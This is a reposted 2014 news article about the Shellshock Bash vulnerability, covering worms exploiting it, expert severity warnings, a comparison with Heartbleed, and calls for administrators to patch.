Could the Bash bug cause an internet MELTDOWN? Hackers scramble to exploit Shellshock flaw as experts warn your details may be at risk

Home »Could the Bash bug cause an internet MELTDOWN? Hackers scramble to exploit Shellshock flaw as experts warn your details may be at risk

Could the Bash bug cause an internet MELTDOWN? Hackers scramble to exploit Shellshock flaw as experts warn your details may be at risk

Posted by sciencetech-blog on Friday, September 26, 2014 Label:

comments

Hackers have begun exploiting the devastating Bash bug, using worm viruses to scan for vulnerable computers before infecting them.

The Bash bug, also known as 'Shellshock', is a flaw in a piece of software known as 'Bash' that runs the command prompt on many Unix computers.

As damage from the bug spreads, many of the early patches designed to safeguard computers are proving ineffective.

Errata security researcher Robert Graham tweeted (pictured) an example of how the bug can be exploited, and how code can be added, to websites on Macs running OSX. He warned that Bash is 'probably a bigger deal than Heartbleed' because it could threaten the security of millions of websites

'That's a problem. It's been a little over 24 hours and we're still in the same boat,' said Mat Gangwer, lead security consultant at Rook Security.

'People are kind of freaking out. Rightfully so.'

Expert Richard Stiennon wrote that the code could quickly create a 'SQL Slammer type internet meltdown.'

More...

This was a specific kind of attack that targeted the web's infastructure and caused it slow significantly in 2003.

This includes Linux, which is used in everything from cars to cameras, as well as the Raspberry Pi, and the bug could also affect Android, Windows and IBM machines.

All Apple's Mac OS X are also affected, as well as around half of all websites, security experts claim.

Hackers are already using massive internet scans to find vulnerable servers to attack, according to Robert Graham of Errata Security, writing In a blog post yesterday.

All Apple's Mac OS X are also affected as well as around half of all websites, security experts claim

In a test, Mr Graham ran a IP scan and found 3,000 vulnerable systems before the scan crashed.

Just a few hours later, Mr Graham found that someone was already using his method to attack computers.

HOW WILL YOU BE AFFECTED?

The bug makes all Apple Mac computers, around half of all websites and most internet connected home appliances vulnerable.

The danger is that it can run in the background, without a user ever knowing. And once it does, a hacker will be able to take control of your device.

For instance, the bug could be used to read or send emails, copy banking data, turn on a webcam or listen in on a computer's microphone.

Essentially, this means if your computer will do something without asking for a password, then someone using the bug can also do the same.

Anyone using these devices will need to include a 'patch' update to the software as soon as it is released. As well as computers, the public is being warned they may need to update their internet-connected devices, such as smart locks, separately.

'Someone is using mass scan to deliver malware,' Mr Graham wrote in an update. 'They'll likely have compromised most of the systems I've found by tomorrow morning.'

The attack has become known as 'Thanks, Rob' worm, and show the dangers of how short-term attacks could happen before devices are updated with a patch.

'One key question is whether Mac OS X and iPhone DHCP service is vulnerable, he said.

'Once the worm gets behind a firewall and runs a hostile DHCP server, that would be "game over" for large networks.'

Many experts claim the flaw could be 'bigger than Heartbleed', a flaw in Open SSL encryption that put every computer user at risk earlier this year.

'The impact is very severe, it's not overstating it to say it's a more serious bug than Heartbleed,' Professor Tim Watson, Director of the Cyber at Warwick University told MailOnline.

'The primary way this is going to be exploited is through the web… a hacker can use the bug to put malicious things on the website or to steal information, like banking details.'

Many Linux providers, including Red Hat, have already prepared patches, but Apple users were left waiting for an update for OS X. Apple representatives could not be reached.

Tavis Ormandy, a Google security researcher, said via Twitter that the patches seemed 'incomplete.'

Bash stands for Bourne Again Shell. It is what's called a command-line shell that lets users control software programs and features. Commands are sent to these programs by typing text into a particular area of code. This code is typically restricted to programmers, but the Bash bug leaves it open to attack from anyone

'There is a lot of speculation out there as to what is vulnerable, but we just don't have the answers,' said Marc Maiffret, chief technology officer of cybersecurity firm BeyondTrust. 'This is going to unfold over the coming weeks and months.'

Russian security software maker Kaspersky Lab reported that a computer worm has begun infecting computers by exploiting the Bash bug.

The malicious software can take control of an infected machine, launch denial-of-service attacks on websites to disrupt their operations and scan for other vulnerable devices, including routers, said Kaspersky researcher David Jacoby.

He said he did not know who was behind the attacks and could not name any victims.

'The primary way this is going to be exploited is through the web… a hacker can use the bug to put malicious things on the website or to steal information, like banking details.'

WHAT IS THE BASH BUG AND HOW DOES IT WORK?

Bash stands for Bourne Again Shell. It is what's called a command-line shell that lets users control software programs and features.

Commands are sent to these programs by typing text into a particular area of code.

This area is typically restricted to programmers and website owners, but the Bash bug leaves it open to attack from anyone.

For example, Mac OS X users can run it by from their Terminal, as can people running devices on the Linux operating system.

Windows is not affected in the same way, but if a hacker exploits malicious code through the flaw, they could gain access to any device, in theory, including PCs.

The bug is said to have existed for 25 years, and was discovered by Linux expert Stéphane Chazelas.

As an example, the Apache web server runs Bash in the background to carry out tasks, including processing personal data entered into online form.

A hacker who exploits Bash could send a request for the information, and then add malicious code to the server to send the user to other sites, or to install a virus on their computer.

Once the hacker has access, they could launch an attack on every visitor that users the site - and users could be none the wiser.

According to experts, there haven't been any reports of real-word attacks, but that doesn't mean they won't ever be affected, nor does it mean they haven't happened in the past, without being detected.

Reports are suggesting Apple has patched the flaw that explicitly affects the terminal on its Mac software, but the firm has not officially confirmed this.

The responsibility to fix the flaw lies with the website owners, meaning everyday users can't do anything to protect themselves.

Website owners, especially running on Linux-based servers, are being told to check and patch their systems immediately.

The Heartbleed flaw in Open SSL encryption affected millions of sites earlier this year. By comparison, Heartbleed only allowed hackers to spy on computers; not take control of them

The bug, could potentially allow hackers to gain access to every internet-enabled device in a person's home using something as innocuous as a smart lightbulb.

The danger with this, in particular, is that once it has access to an internet-connected device it can jump onto others, in theory. This includes smart locks that open front doors.

Errata security researcher Robert Graham tweeted an example of how the bug can be exploited, and how code can be added, to websites on Macs running OSX.

By comparison, 'Heartbleed' - dubbed a 'critical security flaw' at the time - only allowed hackers to spy on computers, not take control of them.

Bash does not require users to rush change their passwords, but it does provide another way for hackers to take control of computers and devices.

'The method of exploiting this issue is also far simpler. You can just cut and paste a line of code and get good results,' according to Dan Guido, chief executive of cybersecurity firm Trail of Bits.

Its potential to disrupt Apple Mac computers, which uses the Bash software, is of particular concern, experts warned.

Howcast guide: How to change your IP address

The bug could allow hackers to gain access to every internet-enabled device in a person's home.The danger with this is that once it has access to a internet-connected device it can jump onto others in the home, in theory. This includes smart locks, such as the August lock (pictured), that open front doors remotely

HOW DOES THE BASH BUG COMPARE WITH HEARTBLEED?

Unlike Heartbleed, which only affected a specific version of OpenSSL, the Bash bug has been around for a long time.

'That means there are lots of old devices on the network vulnerable to this bug,' said Robert Graham, of security firm Errata.

'The number of systems needing to be patched, but which won't be, is much larger than Heartbleed.'

The Heartbleed bug allowed hackers to spy on millions of computers all over the world.

Bash, however, allows hackers to read information, edit, delete or copy files, and run programmes. All of this can take place without the user knowing.

Unlike Heartbleed, which forced users to change their passwords, Bash doesn't have an easy fix. It will largely be up to system administrators and software companies to issue patches.

The only solution is to update every device that is vulnerable with a patch. And this can only be done by website and server owners, and by individuals on their home computers.

Tod Beardsley, an engineering manager at cybersecurity firm Rapid7, warned the bug was rated a '10' for severity, meaning it has maximum impact.

He also rated it 'low' for complexity of exploitation, meaning it is relatively easy for hackers to launch attacks.

'Using this vulnerability, attackers can potentially take over the operating system, access confidential information, make changes, et cetera,' Mr Beardsley said.

'Anybody with systems using Bash needs to deploy the patch immediately.'

'Heartbleed,' discovered in April, was a bug in an open-source encryption software called OpenSSL.

The bug put the data of millions of people at risk as OpenSSL is used in about two-thirds of all websites.

It also forced dozens of technology companies to issue security patches for hundreds of products that use OpenSSL.

Bash is a shell, or command prompt software, produced by the non-profit Free Software Foundation. Officials at that group could not be reached for comment.

Put the internet to work for you.

Turn off or edit this Recipe

sciencetech-blog